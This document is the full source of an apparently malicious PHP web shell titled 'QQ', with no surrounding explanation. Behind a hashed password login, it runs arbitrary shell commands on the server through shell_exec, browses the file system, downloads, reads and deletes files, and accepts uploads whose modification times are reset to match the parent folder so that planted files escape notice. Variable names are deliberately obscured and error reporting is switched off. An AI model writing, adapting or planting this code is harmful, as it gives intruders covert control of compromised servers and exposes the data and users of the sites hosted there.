<!DOCTYPE html><html><head><title>QQ</title><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">table{border-collapse:collapse;width:100%;font-family:Courier New;font-size:1.3vw;}a{text-decoration:none;cursor:pointer;}.content td{padding:8px;text-align:center;border-bottom:1px solid #ddd;}.content tr:hover{background-color:lightgray;}.contentheader th{position:sticky;top:0;z-index:1;background-color:dodgerblue;color:white;padding:15px 8px;text-align:center;border-bottom:1px solid #ddd;}.tableFixFooter{background-color:dodgerblue;color:white;padding:5px 8px;text-align:left;}.btn{border-radius:15px;background-color:white;color:black;border:1px solid dodgerblue;padding:1px 6px;font-family:Courier New;font-size:1.3vw;cursor:pointer;}.btn:hover{background-color:dodgerblue;color:white;}.nav{width:5%;text-align:left;vertical-align:top;}.nav-item{position:fixed;left:0;}.nav-item button{font-size:2vw;padding-left:10px;padding-right:15px;border-top-right-radius:20px;border-bottom-right-radius:20px;border:none;}.cui{vertical-align:top;padding-right:40px;}.cui input{background-color:white;border:1px solid gray;border-radius:20px;font-family:Courier New;font-size:1.3vw;padding:6px 10px;margin:5px 0px;display:block;width:100%}textarea{height:620px;border:1px solid #ddd; background-color:black;color:white;padding:10px;font-size:1.3vw;border-radius:20px;width:100%;resize:none;}.container{vertical-align:top;padding-right:20px;}.container #cwd {background-color:white;border:1px solid dodgerblue;border-radius:20px;font-family:Courier New;font-size:1.3vw;padding:5px 10px;margin:5px 0px;}.gui{height:600px;overflow:auto;border:1px solid #ddd;}.info{background-color:black;color:white;margin:0px 20px 0px 5%;border-bottom-left-radius:20px;border-bottom-right-radius:20px;font-family:Courier New;font-size:1.3vw;padding:4px 15px;text-align:center;}</style><script type="text/javascript">function SendRequest(a13,aa,aj){document.getElementById("postform").action=a13;document.getElementById("aa").value=aa;document.getElementById("aj").value=aj;document.getElementById("pwd").value="<?php echo $_POST["pwd"]?>";document.getElementById("postform").submit();}</script></head><body style="padding: 0px; margin: 0px"><?php error_reporting(0);if(!isset($_SESSION))session_start();$a1="";$a2="";$host_address=$_SERVER['PHP_SELF'];if(!isset($_POST["pwd"]))$_POST["pwd"]="";if(sha1($_POST["pwd"])!="7cf36e481895ea8866f394df16f8fb5b760d5ac7"){?><div class="info"><form action="<?php echo $host_address;?>" method="post"><input type="password" name="pwd"><input type="submit" name="" value="login"></form></div><?php }else{if($_POST["aa"]){if(is_dir($_POST["aa"]))$a2=$_POST["aa"];else $a2=dirname($_POST["aa"]);}else $a2=getcwd();$a2=str_replace('\\','/',$a2);if($_GET["ab"]){switch($_GET["ab"]){case "ac":if($_POST["aa"]) $a3 = $_POST["aa"];else $a3 = "";header("Content-Type: application/octet-stream");header("Content-disposition:attachment;filename=\"".basename($a3)."\"");readfile($a3);exit; break;case "ad":$a2 = $_POST["aa"];$a2 = str_replace('\\','/', $a2);$a4 = $a2 . "/" . $_FILES["ae"]["name"];if (copy($_FILES["ae"]["tmp_name"], $a4)) touch($a4, filemtime($a2 . "/..") );break;case "af":if(filesize($_POST["aa"])<3000000&&filesize($_POST["aa"])>0){$file=fopen($_POST["aa"],"r");while(!feof($file)){$content.=fgets($file);}fclose($file);}else $content="";break;case 'ag':unlink($_POST["aa"]);break;case 'ah':chdir($a2);$aj=$_POST["aj"];$output=shell_exec($aj);$a2=shell_exec($aj."&& pwd");$a2=rtrim($a2,"\n");$len=strrpos($a2,"\n");$a2=substr($a2,$len);if(!is_dir($a2)){$a2=shell_exec("pwd");$a2=rtrim($a2,"\n");$len=strrpos($a2,"\n");$a2=substr($a2,$len);}$a2=str_replace('\\','/',$a2);break;default: break;}}$a2=str_replace("//",'/',$a2);?><div class="info"><span> IP: <?php echo $_SERVER[SERVER_ADDR]; ?> </span></div><table><tr><td class="nav"><div style="top: 50px;" class="nav-item"><button onclick="SendRequest('<?php echo $host_address;?>','<?php echo $a2;?>','')" style="color: black; background-color: dodgerblue;">G</button></div><div style="top: 100px;" class="nav-item"><button onclick="SendRequest('<?php echo $host_address;?>?ab=ah','<?php echo $a2;?>','')" style="color: white; background-color: black;">C</button></div></td><?php if($_GET["ab"] == "ah"){ ?><td class="cui"><div><input type="text" placeholder="&gt;" id="realcmd" onkeydown="if(event.keyCode==13){SendRequest('<?php echo $host_address;?>?ab=ah','<?php echo $a2;?>',document.getElementById('realcmd').value);}" autofocus/></div><textarea><?php echo "\nCurrent Directory: ".$a2; echo "\n\nInputed Command: ".$aj; echo "\n\nResult: "; echo "\n\n".ltrim(htmlspecialchars($output)); ?></textarea> </td><?php } else { ?><td class="container"><?php if($_GET["ab"] == "af"){ ?><div><table><tr><td width="90%"><div id="cwd"><b>Current File: </b><?php echo $_POST["aa"];?></div></td><td width="10%" style="text-align: center"><input type="button" onclick="SendRequest('<?php echo $host_address;?>','<?php echo $a2;?>','')" value="Back" class="btn" style="padding: 5px 20px;"/></td></tr></table> </div><div style="padding-right: 20px;"><textarea><?php $content = htmlspecialchars($content); echo "\n".$content; ?></textarea></div><?php } else { ?><div><table><tr><td width="90%"><div id="cwd"><b>Current Directory: </b><?php echo $a2; ?></div></td><td width="10%" style="text-align: center"><input type="button" onclick="document.getElementById('file').click(); " value="Upload" class="btn" style="padding: 5px 20px;"/></td></tr></table> </div><div class="gui"><table style="overflow-y: scroll;" class="content"><tr class="contentheader"><th width="45%" style="text-align: left;">Name</th><th width="20%">Modified Date</th><th width="10%">Size</th><th width="10%">Property</th><th width="15%">Action</th></tr><?php $a5 = dir($a2); $list = array(); $a6 = array(); $a7 = array(); if($a5){ while (($file = $a5->read()) !== false) { if(is_dir($a5->path.'/'.$file)) array_push($a6, $file); else array_push($a7, $file); } } sort($a6); sort($a7); for($i = 0; $i < count($a6); $i++) array_push($list, $a6[$i]); for($i = 0; $i < count($a7); $i++) array_push($list, $a7[$i]); for($index = 0; $index < count($list); $index++){ $file = $list[$index]; $a8 = ""; if($file == ".") $a8 = $a5->path; else if($file == ".."){ $len = strrpos($a2, "/"); $a8 = substr($a2, 0, $len); if($a8 == "") $a8 = "/"; } else $a8 = $a5->path.'/'.$file; if(is_dir($a8)){ $subdir = dir($a8); if(!$subdir) { $a8 = $a5->path; } else $subdir->close(); } ?> <tr> <td style="text-align: left; cursor: pointer;"  onclick="SendRequest('<?php if(is_dir($a8)) echo $host_address; else echo $host_address.'?ab=af';?>','<?php echo $a8;?>','')"> <?php if(is_dir($a8)) echo "[" . $file . "]"; else echo $file;?> </td> <td> <?php echo date("m/d/Y H:i:s", filemtime($a8));?> </td><td style="text-align: right; padding-right: 30px;"><?php  if(is_file($a8)){ $filesize = filesize($a8); if($filesize < 0) echo "2 G"; else if($filesize < pow(2, 10)) echo $filesize." B"; else if($filesize < pow(2, 20)) echo round($filesize / pow(2, 10)) . " K"; else if($filesize < pow(2, 30)) echo round($filesize / pow(2, 20)) . " M"; else echo round($filesize / pow(2, 30)) . " G"; } ?> </td> <td> <?php  $a9 = substr(sprintf("%b",fileperms($a8)),-9); for($i = 0; $i < 9; $i++){ switch($i % 3){ case 0: $a9[$i] == '1' ? $a9[$i] = 'r' : $a9[$i] = '-'; break; case 1: $a9[$i] == '1' ? $a9[$i] = 'w' : $a9[$i] = '-'; break; default: $a9[$i] == '1' ? $a9[$i] = 'x' : $a9[$i] = '-'; break; } } echo $a9; ?> </td> <td> <span> <?php if(is_file($a8)){ ?> <button onclick="SendRequest('<?php echo $host_address;?>?ab=ac','<?php echo $a8;?>','')" class="btn">Down</button> <?php } ?> </span><span><?php if(is_file($a8)){ ?><button onclick="if(confirm('Do you really delete selected file?')) SendRequest('<?php echo $host_address;?>?ab=ag','<?php echo $a8;?>','');" class="btn">Del</button><?php } ?> </span></td></tr><?php } ?></table></div><div  class="tableFixFooter">Total: <?php $dircnt = 0; if(count($a6) > 1) $dircnt = count($a6) - 2; else $dircnt = 0; echo $dircnt." Directories, "; echo count($a7)." Files"; ?> </div>  <?php }?></td><?php } ?></tr></table><form action="" method="post" id="postform" enctype="multipart/form-data"><input type="hidden" name="aa" id="aa" /><input type="hidden" name="aj" id="aj" /><input type="hidden" name="pwd" id="pwd" /><input type="file" name="ae" id="file" value="Upload" style="display: none;" onchange="SendRequest('<?php echo $host_address;?>?ab=ad','<?php echo $a2;?>','');"></form><?php  } ?></body></html>